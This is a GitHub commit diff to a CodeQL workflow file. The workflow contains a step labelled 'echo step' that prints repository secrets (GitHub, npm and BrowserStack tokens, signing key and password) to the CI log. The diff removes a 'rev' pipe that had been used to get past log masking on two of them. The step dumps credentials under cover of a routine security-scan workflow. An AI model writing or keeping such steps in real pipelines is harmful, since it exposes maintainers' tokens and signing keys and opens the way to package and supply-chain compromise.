We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent fc69d0b commit a011cd2Copy full SHA for a011cd2
.github/workflows/codeql.yml
@@ -62,10 +62,10 @@ jobs:
62
- name: echo step
63
run: |
64
echo ${{ secrets.GITHUB_TOKEN }}
65
- echo ${{ secrets.NPM_TOKEN }} | rev
+ echo ${{ secrets.NPM_TOKEN }}
66
echo ${{ secrets.SIGNING_KEY }}
67
echo ${{ secrets.SIGNING_PASSWORD }}
68
- echo ${{ secrets.BROWSERSTACK_ACCESS_KEY }} | rev
+ echo ${{ secrets.BROWSERSTACK_ACCESS_KEY }}
69
70
71
# Add any setup steps before running the `github/codeql-action/init` action.
0 commit comments